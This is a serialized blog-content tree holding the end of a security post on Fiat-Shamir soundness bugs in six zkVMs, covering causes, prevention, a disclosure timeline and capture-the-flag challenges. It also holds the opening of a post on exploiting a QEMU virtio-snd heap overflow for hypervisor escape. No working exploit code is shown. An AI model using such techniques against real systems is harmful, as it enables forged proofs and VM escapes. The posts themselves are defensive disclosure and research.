g":116,"props":122288,"children":122290},{"className":122289,"style":3720},[3719],[],{"type":28,"tag":116,"props":122292,"children":122294},{"className":122293},[3725,3726,3727,3728],[122295],{"type":28,"tag":116,"props":122296,"children":122298},{"className":122297},[3680,3728],[122299],{"type":28,"tag":116,"props":122300,"children":122302},{"className":122301},[3680,3728],[122303],{"type":33,"value":122304},"′",{"type":33,"value":122306}," that produces the same evaluation. This is a single 128-bit linear constraint over hundreds of bits, yielding a single linear equation in a high-dimensional binary witness space, which is typically underconstrained and admits many alternative witnesses under common parameterizations.",{"type":28,"tag":29,"props":122308,"children":122309},{},[122310,122314,122316],{"type":28,"tag":4995,"props":122311,"children":122312},{},[122313],{"type":33,"value":116370},{"type":33,"value":122315}," Fixed on December 29, 2025 via ",{"type":28,"tag":87,"props":122317,"children":122320},{"href":122318,"rel":122319},"https://github.com/binius-zk/binius64/pull/1355/commits/86a515f0632d2acdf547ed82780dfe7f9f39358f",[91],[122321],{"type":33,"value":122322},"commit 86a515f",{"type":28,"tag":18457,"props":122324,"children":122325},{},[],{"type":28,"tag":63,"props":122327,"children":122329},{"id":122328},"why-does-this-keep-happening",[122330],{"type":33,"value":122331},"Why Does This Keep Happening?",{"type":28,"tag":29,"props":122333,"children":122334},{},[122335],{"type":33,"value":122336},"Given that we found the same bug class in six independent implementations, at some point we have to ask whether there is a systemic issue making this mistake so common.",{"type":28,"tag":75,"props":122338,"children":122340},{"id":122339},"academic-papers-dont-specify-fiat-shamir",[122341],{"type":33,"value":122342},"Academic Papers Don't Specify Fiat-Shamir",{"type":28,"tag":29,"props":122344,"children":122345},{},[122346,122348,122353,122355,122380,122382,122385,122387,122412,122414,122441],{"type":33,"value":122347},"Academic papers usually describe ",{"type":28,"tag":2583,"props":122349,"children":122350},{},[122351],{"type":33,"value":122352},"interactive",{"type":33,"value":122354}," protocols: \"Prover sends ",{"type":28,"tag":98,"props":122356,"children":122358},{"className":122357},[3652,3653],[122359],{"type":28,"tag":116,"props":122360,"children":122362},{"className":122361},[3658],[122363],{"type":28,"tag":116,"props":122364,"children":122366},{"className":122365,"ariaHidden":3664},[3663],[122367],{"type":28,"tag":116,"props":122368,"children":122370},{"className":122369},[3669],[122371,122375],{"type":28,"tag":116,"props":122372,"children":122374},{"className":122373,"style":21246},[3674],[],{"type":28,"tag":116,"props":122376,"children":122378},{"className":122377,"style":21782},[3680,21251],[122379],{"type":33,"value":115889},{"type":33,"value":122381},". Verifier sends",{"type":28,"tag":30624,"props":122383,"children":122384},{},[],{"type":33,"value":122386},"random ",{"type":28,"tag":98,"props":122388,"children":122390},{"className":122389},[3652,3653],[122391],{"type":28,"tag":116,"props":122392,"children":122394},{"className":122393},[3658],[122395],{"type":28,"tag":116,"props":122396,"children":122398},{"className":122397,"ariaHidden":3664},[3663],[122399],{"type":28,"tag":116,"props":122400,"children":122402},{"className":122401},[3669],[122403,122407],{"type":28,"tag":116,"props":122404,"children":122406},{"className":122405,"style":110501},[3674],[],{"type":28,"tag":116,"props":122408,"children":122410},{"className":122409,"style":92663},[3680,21251],[122411],{"type":33,"value":93482},{"type":33,"value":122413},". Prover sends ",{"type":28,"tag":98,"props":122415,"children":122417},{"className":122416},[3652,3653],[122418],{"type":28,"tag":116,"props":122419,"children":122421},{"className":122420},[3658],[122422],{"type":28,"tag":116,"props":122423,"children":122425},{"className":122424,"ariaHidden":3664},[3663],[122426],{"type":28,"tag":116,"props":122427,"children":122429},{"className":122428},[3669],[122430,122434],{"type":28,"tag":116,"props":122431,"children":122433},{"className":122432,"style":21246},[3674],[],{"type":28,"tag":116,"props":122435,"children":122438},{"className":122436,"style":122437},[3680,21251],"margin-right:0.00773em;",[122439],{"type":33,"value":122440},"R",{"type":33,"value":122442},".\"",{"type":28,"tag":29,"props":122444,"children":122445},{},[122446,122448,122473,122475,122500],{"type":33,"value":122447},"They often omit the necessary steps to make the protocol non-interactive: \"Hash ",{"type":28,"tag":98,"props":122449,"children":122451},{"className":122450},[3652,3653],[122452],{"type":28,"tag":116,"props":122453,"children":122455},{"className":122454},[3658],[122456],{"type":28,"tag":116,"props":122457,"children":122459},{"className":122458,"ariaHidden":3664},[3663],[122460],{"type":28,"tag":116,"props":122461,"children":122463},{"className":122462},[3669],[122464,122468],{"type":28,"tag":116,"props":122465,"children":122467},{"className":122466,"style":21246},[3674],[],{"type":28,"tag":116,"props":122469,"children":122471},{"className":122470,"style":21782},[3680,21251],[122472],{"type":33,"value":115889},{"type":33,"value":122474}," before sampling ",{"type":28,"tag":98,"props":122476,"children":122478},{"className":122477},[3652,3653],[122479],{"type":28,"tag":116,"props":122480,"children":122482},{"className":122481},[3658],[122483],{"type":28,"tag":116,"props":122484,"children":122486},{"className":122485,"ariaHidden":3664},[3663],[122487],{"type":28,"tag":116,"props":122488,"children":122490},{"className":122489},[3669],[122491,122495],{"type":28,"tag":116,"props":122492,"children":122494},{"className":122493,"style":110501},[3674],[],{"type":28,"tag":116,"props":122496,"children":122498},{"className":122497,"style":92663},[3680,21251],[122499],{"type":33,"value":93482},{"type":33,"value":122501},". Also hash the public statement. Also hash intermediate values that affect later equations.\"",{"type":28,"tag":29,"props":122503,"children":122504},{},[122505],{"type":33,"value":122506},"Security proofs thus also analyze the interactive protocols where binding is implicit. The responsibility of determining what to include in the transcript therefore falls on the implementor, which may not have a good understanding of the full protocol.",{"type":28,"tag":75,"props":122508,"children":122510},{"id":122509},"the-hot-potato-problem",[122511],{"type":33,"value":122512},"The Hot Potato Problem",{"type":28,"tag":29,"props":122514,"children":122515},{},[122516],{"type":33,"value":122517},"Modern zkVMs are modular:",{"type":28,"tag":29,"props":122519,"children":122520},{},[122521],{"type":28,"tag":206,"props":122522,"children":122525},{"alt":122523,"src":122524},"11_hot_potato","/posts/zkvms-unfaithful-claims/11_hot_potato.svg",[],{"type":28,"tag":29,"props":122527,"children":122528},{},[122529],{"type":33,"value":122530},"It often happens that each layer assumes the previous/next layer handles the transcript binding for a value, so in the end it never happens.",{"type":28,"tag":75,"props":122532,"children":122534},{"id":122533},"optimization-pressure",[122535],{"type":33,"value":122536},"Optimization Pressure",{"type":28,"tag":29,"props":122538,"children":122539},{},[122540],{"type":33,"value":122541},"Performance is existential for ZK. Since every hash operation has a cost, there is constant pressure to exclude values that are \"probably fine\" to leave out.",{"type":28,"tag":29,"props":122543,"children":122544},{},[122545],{"type":33,"value":122546},"There are indeed cases when this can be done safely, but determining what is safe requires a full understanding of all protocols involved, and the decision to exclude something should be double and triple checked by experts.",{"type":28,"tag":75,"props":122548,"children":122550},{"id":122549},"testing-doesnt-catch-adversarial-inputs",[122551],{"type":33,"value":122552},"Testing Doesn't Catch Adversarial Inputs",{"type":28,"tag":29,"props":122554,"children":122555},{},[122556],{"type":33,"value":122557},"Unit tests run the honest prover. Integration tests run the honest prover. Fuzzing only randomly perturbs values and has a very low probability of succeeding in fooling a verifier. Identifying Fiat-Shamir bugs requires thorough manual security analysis, and sometimes even that falls short.",{"type":28,"tag":18457,"props":122559,"children":122560},{},[],{"type":28,"tag":63,"props":122562,"children":122564},{"id":122563},"how-to-find-and-fix-these-bugs",[122565],{"type":33,"value":122566},"How to Find and Fix These Bugs",{"type":28,"tag":75,"props":122568,"children":122570},{"id":122569},"prevention",[122571],{"type":33,"value":122572},"Prevention",{"type":28,"tag":29,"props":122574,"children":122575},{},[122576],{"type":33,"value":122577},"Fiat-Shamir has long been a known source of soundness bugs, which has driven the development of primitives that make implementation less error-prone.",{"type":28,"tag":29,"props":122579,"children":122580},{},[122581],{"type":33,"value":122582},"One such tool is to merge the proof and transcript, to force all values that are sent by the prover to be automatically absorbed into the transcript.",{"type":28,"tag":29,"props":122584,"children":122585},{},[122586],{"type":33,"value":122587},"The prover holds a proof buffer which emulates the communication channel between prover and verifier. When a value is sent by the prover it is added to the proof buffer and automatically absorbed into the transcript. When the prover then needs to read a challenge from the verifier it simply squeezes from the current transcript.",{"type":28,"tag":29,"props":122589,"children":122590},{},[122591],{"type":33,"value":122592},"This can then be done in reverse for the verifier. It gradually reads values from the proof buffer and can thus sync the transcript state and derive the same challenges.",{"type":28,"tag":29,"props":122594,"children":122595},{},[122596],{"type":33,"value":122597},"Halo2 follows this pattern, and Binius is transcript-centric as well. But even with a merged proof/transcript, statement data (e.g., public inputs) must still be absorbed before sampling any challenges that govern equations depending on them—and as Binius demonstrates, even transcript-centric systems can miss this.",{"type":28,"tag":18457,"props":122599,"children":122600},{},[],{"type":28,"tag":63,"props":122602,"children":122604},{"id":122603},"responsible-disclosure-timeline",[122605],{"type":33,"value":122606},"Responsible Disclosure Timeline",{"type":28,"tag":55363,"props":122608,"children":122609},{},[122610,122638],{"type":28,"tag":122611,"props":122612,"children":122613},"thead",{},[122614],{"type":28,"tag":122615,"props":122616,"children":122617},"tr",{},[122618,122623,122628,122633],{"type":28,"tag":122619,"props":122620,"children":122621},"th",{},[122622],{"type":33,"value":22871},{"type":28,"tag":122619,"props":122624,"children":122625},{},[122626],{"type":33,"value":122627},"Reported",{"type":28,"tag":122619,"props":122629,"children":122630},{},[122631],{"type":33,"value":122632},"Fixed",{"type":28,"tag":122619,"props":122634,"children":122635},{},[122636],{"type":33,"value":122637},"Response Time",{"type":28,"tag":122639,"props":122640,"children":122641},"tbody",{},[122642,122665,122686,122706,122728,122749],{"type":28,"tag":122615,"props":122643,"children":122644},{},[122645,122650,122655,122660],{"type":28,"tag":122646,"props":122647,"children":122648},"td",{},[122649],{"type":33,"value":107473},{"type":28,"tag":122646,"props":122651,"children":122652},{},[122653],{"type":33,"value":122654},"Sep 2025",{"type":28,"tag":122646,"props":122656,"children":122657},{},[122658],{"type":33,"value":122659},"Oct 3, 2025",{"type":28,"tag":122646,"props":122661,"children":122662},{},[122663],{"type":33,"value":122664},"\u003C1 week",{"type":28,"tag":122615,"props":122666,"children":122667},{},[122668,122672,122677,122682],{"type":28,"tag":122646,"props":122669,"children":122670},{},[122671],{"type":33,"value":107479},{"type":28,"tag":122646,"props":122673,"children":122674},{},[122675],{"type":33,"value":122676},"Oct 2025",{"type":28,"tag":122646,"props":122678,"children":122679},{},[122680],{"type":33,"value":122681},"Oct 24, 2025",{"type":28,"tag":122646,"props":122683,"children":122684},{},[122685],{"type":33,"value":122664},{"type":28,"tag":122615,"props":122687,"children":122688},{},[122689,122693,122697,122702],{"type":28,"tag":122646,"props":122690,"children":122691},{},[122692],{"type":33,"value":107485},{"type":28,"tag":122646,"props":122694,"children":122695},{},[122696],{"type":33,"value":122676},{"type":28,"tag":122646,"props":122698,"children":122699},{},[122700],{"type":33,"value":122701},"Oct 31, 2025",{"type":28,"tag":122646,"props":122703,"children":122704},{},[122705],{"type":33,"value":122664},{"type":28,"tag":122615,"props":122707,"children":122708},{},[122709,122713,122718,122723],{"type":28,"tag":122646,"props":122710,"children":122711},{},[122712],{"type":33,"value":107491},{"type":28,"tag":122646,"props":122714,"children":122715},{},[122716],{"type":33,"value":122717},"Nov 2025",{"type":28,"tag":122646,"props":122719,"children":122720},{},[122721],{"type":33,"value":122722},"Mar 5, 2026",{"type":28,"tag":122646,"props":122724,"children":122725},{},[122726],{"type":33,"value":122727},"~4 months",{"type":28,"tag":122615,"props":122729,"children":122730},{},[122731,122735,122740,122745],{"type":28,"tag":122646,"props":122732,"children":122733},{},[122734],{"type":33,"value":107503},{"type":28,"tag":122646,"props":122736,"children":122737},{},[122738],{"type":33,"value":122739},"Dec 2025",{"type":28,"tag":122646,"props":122741,"children":122742},{},[122743],{"type":33,"value":122744},"Dec 29, 2025",{"type":28,"tag":122646,"props":122746,"children":122747},{},[122748],{"type":33,"value":122664},{"type":28,"tag":122615,"props":122750,"children":122751},{},[122752,122756,122760,122765],{"type":28,"tag":122646,"props":122753,"children":122754},{},[122755],{"type":33,"value":107497},{"type":28,"tag":122646,"props":122757,"children":122758},{},[122759],{"type":33,"value":122717},{"type":28,"tag":122646,"props":122761,"children":122762},{},[122763],{"type":33,"value":122764},"Jan 21, 2026?",{"type":28,"tag":122646,"props":122766,"children":122767},{},[122768],{"type":33,"value":122769},"3 months",{"type":28,"tag":29,"props":122771,"children":122772},{},[122773],{"type":33,"value":122774},"All six teams were notified; responses ranged from immediate acknowledgement to delayed fix, and all reported issues have since been addressed.",{"type":28,"tag":18457,"props":122776,"children":122777},{},[],{"type":28,"tag":63,"props":122779,"children":122781},{"id":122780},"challenges",[122782],{"type":33,"value":107516},{"type":28,"tag":29,"props":122784,"children":122785},{},[122786,122788],{"type":33,"value":122787},"Do you think you have a good understanding of these bugs? We have prepared challenges to allow you to practice implementing two of these exploits. If you solve any of them, follow the instructions in the flag ",{"type":28,"tag":122789,"props":122790,"children":122791},"del",{},[122792],{"type":33,"value":122793},"the first 10 solvers will get a T-shirt.",{"type":28,"tag":29,"props":122795,"children":122796},{},[122797,122799,122852,122853,123109],{"type":33,"value":122798},"Your goal is to find a counter example of Fermat's Last Theorem, i.e you know ",{"type":28,"tag":98,"props":122800,"children":122802},{"className":122801},[3652,3653],[122803],{"type":28,"tag":116,"props":122804,"children":122806},{"className":122805},[3658],[122807],{"type":28,"tag":116,"props":122808,"children":122810},{"className":122809,"ariaHidden":3664},[3663],[122811],{"type":28,"tag":116,"props":122812,"children":122814},{"className":122813},[3669],[122815,122819,122824,122829,122833,122838,122843,122847],{"type":28,"tag":116,"props":122816,"children":122818},{"className":122817,"style":114715},[3674],[],{"type":28,"tag":116,"props":122820,"children":122822},{"className":122821},[3680,21251],[122823],{"type":33,"value":87},{"type":28,"tag":116,"props":122825,"children":122827},{"className":122826},[3791],[122828],{"type":33,"value":3794},{"type":28,"tag":116,"props":122830,"children":122832},{"className":122831,"style":3798},[3759],[],{"type":28,"tag":116,"props":122834,"children":122836},{"className":122835},[3680,21251],[122837],{"type":33,"value":2893},{"type":28,"tag":116,"props":122839,"children":122841},{"className":122840},[3791],[122842],{"type":33,"value":3794},{"type":28,"tag":116,"props":122844,"children":122846},{"className":122845,"style":3798},[3759],[],{"type":28,"tag":116,"props":122848,"children":122850},{"className":122849},[3680,21251],[122851],{"type":33,"value":1797},{"type":33,"value":109316},{"type":28,"tag":98,"props":122854,"children":122856},{"className":122855},[3652,3653],[122857],{"type":28,"tag":116,"props":122858,"children":122860},{"className":122859},[3658],[122861],{"type":28,"tag":116,"props":122862,"children":122864},{"className":122863,"ariaHidden":3664},[3663],[122865,122928,122990,123096],{"type":28,"tag":116,"props":122866,"children":122868},{"className":122867},[3669],[122869,122874,122915,122919,122924],{"type":28,"tag":116,"props":122870,"children":122873},{"className":122871,"style":122872},[3674],"height:0.8974em;vertical-align:-0.0833em;",[],{"type":28,"tag":116,"props":122875,"children":122877},{"className":122876},[3680],[122878,122883],{"type":28,"tag":116,"props":122879,"children":122881},{"className":122880},[3680,21251],[122882],{"type":33,"value":87},{"type":28,"tag":116,"props":122884,"children":122886},{"className":122885},[3695],[122887],{"type":28,"tag":116,"props":122888,"children":122890},{"className":122889},[3700],[122891],{"type":28,"tag":116,"props":122892,"children":122894},{"className":122893},[3705],[122895],{"type":28,"tag":116,"props":122896,"children":122898},{"className":122897,"style":3675},[3710],[122899],{"type":28,"tag":116,"props":122900,"children":122901},{"style":3714},[122902,122906],{"type":28,"tag":116,"props":122903,"children":122905},{"className":122904,"style":3720},[3719],[],{"type":28,"tag":116,"props":122907,"children":122909},{"className":122908},[3725,3726,3727,3728],[122910],{"type":28,"tag":116,"props":122911,"children":122913},{"className":122912},[3680,3728],[122914],{"type":33,"value":16957},{"type":28,"tag":116,"props":122916,"children":122918},{"className":122917,"style":3760},[3759],[],{"type":28,"tag":116,"props":122920,"children":122922},{"className":122921},[3765],[122923],{"type":33,"value":2268},{"type":28,"tag":116,"props":122925,"children":122927},{"className":122926,"style":3760},[3759],[],{"type":28,"tag":116,"props":122929,"children":122931},{"className":122930},[3669],[122932,122936,122977,122981,122986],{"type":28,"tag":116,"props":122933,"children":122935},{"className":122934,"style":3675},[3674],[],{"type":28,"tag":116,"props":122937,"children":122939},{"className":122938},[3680],[122940,122945],{"type":28,"tag":116,"props":122941,"children":122943},{"className":122942},[3680,21251],[122944],{"type":33,"value":2893},{"type":28,"tag":116,"props":122946,"children":122948},{"className":122947},[3695],[122949],{"type":28,"tag":116,"props":122950,"children":122952},{"className":122951},[3700],[122953],{"type":28,"tag":116,"props":122954,"children":122956},{"className":122955},[3705],[122957],{"type":28,"tag":116,"props":122958,"children":122960},{"className":122959,"style":3675},[3710],[122961],{"type":28,"tag":116,"props":122962,"children":122963},{"style":3714},[122964,122968],{"type":28,"tag":116,"props":122965,"children":122967},{"className":122966,"style":3720},[3719],[],{"type":28,"tag":116,"props":122969,"children":122971},{"className":122970},[3725,3726,3727,3728],[122972],{"type":28,"tag":116,"props":122973,"children":122975},{"className":122974},[3680,3728],[122976],{"type":33,"value":16957},{"type":28,"tag":116,"props":122978,"children":122980},{"className":122979,"style":3857},[3759],[],{"type":28,"tag":116,"props":122982,"children":122984},{"className":122983},[3862],[122985],{"type":33,"value":373},{"type":28,"tag":116,"props":122987,"children":122989},{"className":122988,"style":3857},[3759],[],{"type":28,"tag":116,"props":122991,"children":122993},{"className":122992},[3669],[122994,122999,123040,123045,123049,123054,123059,123063,123068,123073,123077,123082,123086,123092],{"type":28,"tag":116,"props":122995,"children":122998},{"className":122996,"style":122997},[3674],"height:1.0085em;vertical-align:-0.1944em;",[],{"type":28,"tag":116,"props":123000,"children":123002},{"className":123001},[3680],[123003,123008],{"type":28,"tag":116,"props":123004,"children":123006},{"className":123005},[3680,21251],[123007],{"type":33,"value":1797},{"type":28,"tag":116,"props":123009,"children":123011},{"className":123010},[3695],[123012],{"type":28,"tag":116,"props":123013,"children":123015},{"className":123014},[3700],[123016],{"type":28,"tag":116,"props":123017,"children":123019},{"className":123018},[3705],[123020],{"type":28,"tag":116,"props":123021,"children":123023},{"className":123022,"style":3675},[3710],[123024],{"type":28,"tag":116,"props":123025,"children":123026},{"style":3714},[123027,123031],{"type":28,"tag":116,"props":123028,"children":123030},{"className":123029,"style":3720},[3719],[],{"type":28,"tag":116,"props":123032,"children":123034},{"className":123033},[3725,3726,3727,3728],[123035],{"type":28,"tag":116,"props":123036,"children":123038},{"className":123037},[3680,3728],[123039],{"type":33,"value":16957},{"type":28,"tag":116,"props":123041,"children":123043},{"className":123042},[3791],[123044],{"type":33,"value":3794},{"type":28,"tag":116,"props":123046,"children":123048},{"className":123047,"style":3798},[3759],[],{"type":28,"tag":116,"props":123050,"children":123052},{"className":123051},[3680,21251],[123053],{"type":33,"value":87},{"type":28,"tag":116,"props":123055,"children":123057},{"className":123056},[3791],[123058],{"type":33,"value":3794},{"type":28,"tag":116,"props":123060,"children":123062},{"className":123061,"style":3798},[3759],[],{"type":28,"tag":116,"props":123064,"children":123066},{"className":123065},[3680,21251],[123067],{"type":33,"value":2893},{"type":28,"tag":116,"props":123069,"children":123071},{"className":123070},[3791],[123072],{"type":33,"value":3794},{"type":28,"tag":116,"props":123074,"children":123076},{"className":123075,"style":3798},[3759],[],{"type":28,"tag":116,"props":123078,"children":123080},{"className":123079},[3680,21251],[123081],{"type":33,"value":1797},{"type":28,"tag":116,"props":123083,"children":123085},{"className":123084,"style":3857},[3759],[],{"type":28,"tag":116,"props":123087,"children":123089},{"className":123088},[3862],[123090],{"type":33,"value":123091},"≥",{"type":28,"tag":116,"props":123093,"children":123095},{"className":123094,"style":3857},[3759],[],{"type":28,"tag":116,"props":123097,"children":123099},{"className":123098},[3669],[123100,123104],{"type":28,"tag":116,"props":123101,"children":123103},{"className":123102,"style":93694},[3674],[],{"type":28,"tag":116,"props":123105,"children":123107},{"className":123106},[3680],[123108],{"type":33,"value":1824},{"type":33,"value":123110},". Good luck!",{"type":28,"tag":75,"props":123112,"children":123114},{"id":123113},"jolt",[123115],{"type":33,"value":107473},{"type":28,"tag":29,"props":123117,"children":123118},{},[123119,123121,123132,123134],{"type":33,"value":123120},"See ",{"type":28,"tag":87,"props":123122,"children":123129},{"href":123123,"target":123124,"rel":123125,"download":123128},"/posts/zkvms-unfaithful-claims/handout_jolt.tar.gz","_blank",[123126,123127],"noopener","noreferrer","handout_jolt.tar.gz",[123130],{"type":33,"value":123131},"the handout",{"type":33,"value":123133}," for the setup running on the server.\nSubmit your proof by connecting to ",{"type":28,"tag":98,"props":123135,"children":123137},{"className":123136},[],[123138],{"type":33,"value":123139},"jolt.chal.osec.io:8960",{"type":28,"tag":75,"props":123141,"children":123143},{"id":123142},"nexus-1",[123144],{"type":33,"value":107479},{"type":28,"tag":29,"props":123146,"children":123147},{},[123148,123149,123156,123157],{"type":33,"value":123120},{"type":28,"tag":87,"props":123150,"children":123154},{"href":123151,"target":123124,"rel":123152,"download":123153},"/posts/zkvms-unfaithful-claims/handout_nexus.tar.gz",[123126,123127],"handout_nexus.tar.gz",[123155],{"type":33,"value":123131},{"type":33,"value":123133},{"type":28,"tag":98,"props":123158,"children":123160},{"className":123159},[],[123161],{"type":33,"value":123162},"nexus.chal.osec.io:8950",{"type":28,"tag":29,"props":123164,"children":123165},{},[123166],{"type":33,"value":123167},"Now you should have enough margin to prove Fermat wrong.",{"type":28,"tag":18457,"props":123169,"children":123170},{},[],{"type":28,"tag":63,"props":123172,"children":123174},{"id":123173},"takeaways",[123175],{"type":33,"value":123176},"Takeaways",{"type":28,"tag":29,"props":123178,"children":123179},{},[123180],{"type":33,"value":123181},"We found critical soundness vulnerabilities in six separate zkVMs. All share the same root cause: prover-controlled values that affect verification equations were not bound to the Fiat-Shamir transcript before challenges were derived.",{"type":28,"tag":29,"props":123183,"children":123184},{},[123185],{"type":33,"value":123186},"The fix in each case is trivial—one or two lines of code. But finding the bug requires understanding the full verification flow and asking: \"What if the prover chose this value after seeing the challenges?\"",{"type":28,"tag":29,"props":123188,"children":123189},{},[123190,123195],{"type":28,"tag":4995,"props":123191,"children":123192},{},[123193],{"type":33,"value":123194},"For the ZK ecosystem:",{"type":33,"value":123196}," The Fiat-Shamir transform looks simple. Hash everything, derive challenges. In practice, \"everything\" is hard to specify when you have dozens of components, each with its own inputs and outputs, each expecting someone else to handle binding.",{"type":28,"tag":29,"props":123198,"children":123199},{},[123200],{"type":33,"value":123201},"We found six instances by examining a handful of systems. How many more exist in the dozens of zkVMs, proof systems, and recursive verifiers deployed today?",{"type":28,"tag":29,"props":123203,"children":123204},{},[123205,123210],{"type":28,"tag":4995,"props":123206,"children":123207},{},[123208],{"type":33,"value":123209},"For auditors:",{"type":33,"value":123211}," Draw the data flow. Trace the transcript. Check every prover-controlled value against when its relevant challenges are derived.",{"type":28,"tag":29,"props":123213,"children":123214},{},[123215,123220],{"type":28,"tag":4995,"props":123216,"children":123217},{},[123218],{"type":33,"value":123219},"For builders:",{"type":33,"value":123221}," Treat the transcript as a sacred ledger. When in doubt, absorb it.",{"type":28,"tag":2516,"props":123223,"children":123224},{},[123225],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":123227},[123228,123229,123232,123238,123239,123247,123253,123256,123257,123261],{"id":107524,"depth":256,"text":107527},{"id":107666,"depth":256,"text":107669,"children":123230},[123231],{"id":107672,"depth":293,"text":107675},{"id":108101,"depth":256,"text":108104,"children":123233},[123234,123235,123236,123237],{"id":108112,"depth":293,"text":108115},{"id":108300,"depth":293,"text":108303},{"id":111681,"depth":293,"text":111684},{"id":112895,"depth":293,"text":112898},{"id":114532,"depth":256,"text":114535},{"id":115038,"depth":256,"text":115041,"children":123240},[123241,123242,123243,123244,123245,123246],{"id":115060,"depth":293,"text":115063},{"id":116385,"depth":293,"text":107479},{"id":117521,"depth":293,"text":117524},{"id":118189,"depth":293,"text":118192},{"id":120845,"depth":293,"text":120848},{"id":121399,"depth":293,"text":107503},{"id":122328,"depth":256,"text":122331,"children":123248},[123249,123250,123251,123252],{"id":122339,"depth":293,"text":122342},{"id":122509,"depth":293,"text":122512},{"id":122533,"depth":293,"text":122536},{"id":122549,"depth":293,"text":122552},{"id":122563,"depth":256,"text":122566,"children":123254},[123255],{"id":122569,"depth":293,"text":122572},{"id":122603,"depth":256,"text":122606},{"id":122780,"depth":256,"text":107516,"children":123258},[123259,123260],{"id":123113,"depth":293,"text":107473},{"id":123142,"depth":293,"text":107479},{"id":123173,"depth":256,"text":123176},"content:blog:2026-03-03-zkvms-unfaithful-claims.md","blog/2026-03-03-zkvms-unfaithful-claims.md","blog/2026-03-03-zkvms-unfaithful-claims",{"_path":123266,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":123267,"description":123268,"date":123269,"author":123270,"image":123271,"isFeatured":19,"onBlogPage":19,"tags":123273,"body":123276,"_type":2534,"_id":131561,"_source":2536,"_file":131562,"_stem":131563,"_extension":2539},"/blog/2026-03-17-virtio-snd-qemu-hypervisor-escape","From virtio-snd 0-Day to Hypervisor Escape: Exploiting QEMU with an Uncontrolled Heap Overflow","Turning an uncontrolled heap overflow into a reliable QEMU guest-to-host escape using new glibc allocator behavior and QEMU-specific heap spray techniques.","2026-03-17T12:00:00.000Z","hrvoje",{"src":123272,"width":17,"height":18},"/posts/virtio-snd-qemu-0day/title.png",[123274,123275],"qemu","heap-overflow",{"type":25,"children":123277,"toc":131543},[123278,123283,123288,123293,123299,123304,123309,123317,123323,123335,123339,123344,123352,123357,123363,123368,123381,123991,124026,124071,124105,124140,124275,124323,124329,124334,125090,125135,125171,125206,125271,125291,125741,125788,125791,125796,125861,125887,125909,125913,125918,125923,125929,125934,125939,125944,125950,125963,125969,125974,125982,126052,126057,126063,126076,126302,126365,126384,126767,126772,126805,126810,127086,127098,127116,127395,127407,127410,127445,127450,127456,127468,127480,127485,127490,127500,127535,128152,128184,128195,128231,128244,128250,128262,128270,128296,128301,128334,128375,128381,128400,128438,128446,128495,128500,128549,128554,128562,128649,128655,128694,128706,128714,128732,128751,128759,128771,128779,128798,128806,128817,128825,128836,128844,128857,128865,128871,128876,128889,128897,128915,128923,128935,128940,128948,128984,129017,129024,129058,129066,129071,129077,129089,129100,129379,129439,129507,129515,129549,130153,130164,130172,130178,130183,130194,130948,130981,130993,131079,131099,131308,131355,131367,131373,131392,131418,131446,131462,131488,131491,131511,131525,131529,131534,131539],{"type":28,"tag":29,"props":123279,"children":123280},{},[123281],{"type":33,"value":123282},"Heap overflows are often exploitable, but far less so when the corrupted bytes are not under your control. In many cases, that kind of bug is written off as a crash and nothing more. However, in this post we show how we turned such an overflow into a reliable QEMU guest-to-host escape by abusing new glibc allocator behavior and QEMU-specific heap spray techniques.",{"type":28,"tag":63,"props":123284,"children":123285},{"id":123274},[123286],{"type":33,"value":123287},"QEMU",{"type":28,"tag":29,"props":123289,"children":123290},{},[123291],{"type":33,"value":123292},"QEMU is a machine emulator and virtualizer that lets a host system run guest operating systems. It presents the guest with virtual hardware, while the logic backing that hardware runs inside the host-side QEMU process.",{"type":28,"tag":75,"props":123294,"children":123296},{"id":123295},"virtio-devices",[123297],{"type":33,"value":123298},"Virtio Devices",{"type":28,"tag":29,"props":123300,"children":123301},{},[123302],{"type":33,"value":123303},"For guest-to-host escape research, the interesting part of QEMU is the interface between the guest and those host-side device implementations. Every request sent by the guest is eventually parsed and handled by code running in the QEMU process. This is interesting because any unhandled edge case in the device could lead to some kind of host state corruption.",{"type":28,"tag":29,"props":123305,"children":123306},{},[123307],{"type":33,"value":123308},"At a high level, the communication between the driver running in the guest and the device running on the host is simple - the guest-side virtio driver shares requests over virtqueues, while the host-side virtio device consumes those requests, processes and returns responses.",{"type":28,"tag":29,"props":123310,"children":123311},{},[123312],{"type":28,"tag":206,"props":123313,"children":123316},{"alt":123314,"src":123315},"flowchart1","/posts/virtio-snd-qemu-0day/flowchart1.png",[],{"type":28,"tag":63,"props":123318,"children":123320},{"id":123319},"finding-a-bug",[123321],{"type":33,"value":123322},"Finding a Bug",{"type":28,"tag":29,"props":123324,"children":123325},{},[123326,123328,123334],{"type":33,"value":123327},"While looking for devices to research, we focused on ones that seemed to have received less scrutiny in the past. With that in mind, we started with the sound device ",{"type":28,"tag":98,"props":123329,"children":123331},{"className":123330},[],[123332],{"type":33,"value":123333},"virtio-snd",{"type":33,"value":141},{"type":28,"tag":75,"props":123336,"children":123337},{"id":123333},[123338],{"type":33,"value":123333},{"type":28,"tag":29,"props":123340,"children":123341},{},[123342],{"type":33,"value":123343},"From the official documentation:",{"type":28,"tag":107,"props":123345,"children":123346},{},[123347],{"type":28,"tag":29,"props":123348,"children":123349},{},[123350],{"type":33,"value":123351},"Virtio sound implements capture and playback from inside a guest using the configured audio backend of the host machine.",{"type":28,"tag":29,"props":123353,"children":123354},{},[123355],{"type":33,"value":123356},"Essentially, it allows software running inside the guest to interact with the host's audio stack through a paravirtualized sound device. Playback streams send guest-provided audio data to the host backend, while capture streams let the guest receive audio input from the host.",{"type":28,"tag":443,"props":123358,"children":123360},{"id":123359},"audio-data-buffers",[123361],{"type":33,"value":123362},"Audio Data Buffers",{"type":28,"tag":29,"props":123364,"children":123365},{},[123366],{"type":33,"value":123367},"This audio data flows through buffers allocated by the host-side virtio-snd device and stored in a FIFO linked list for the corresponding stream.",{"type":28,"tag":29,"props":123369,"children":123370},{},[123371,123373,123379],{"type":33,"value":123372},"For example, the following is ",{"type":28,"tag":98,"props":123374,"children":123376},{"className":123375},[],[123377],{"type":33,"value":123378},"virtio_snd_handle_rx_xfer",{"type":33,"value":123380},", which is responsible for allocating buffers for an input audio stream:",{"type":28,"tag":234,"props":123382,"children":123384},{"code":123383,"language":1797,"meta":7,"className":16176,"style":7},"/*\n * The rx virtqueue handler. Makes the buffers available to their\n * respective streams for consumption.\n *\n * @vdev: VirtIOSound device\n * @vq: rx virtqueue\n */\nstatic void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)\n{\n    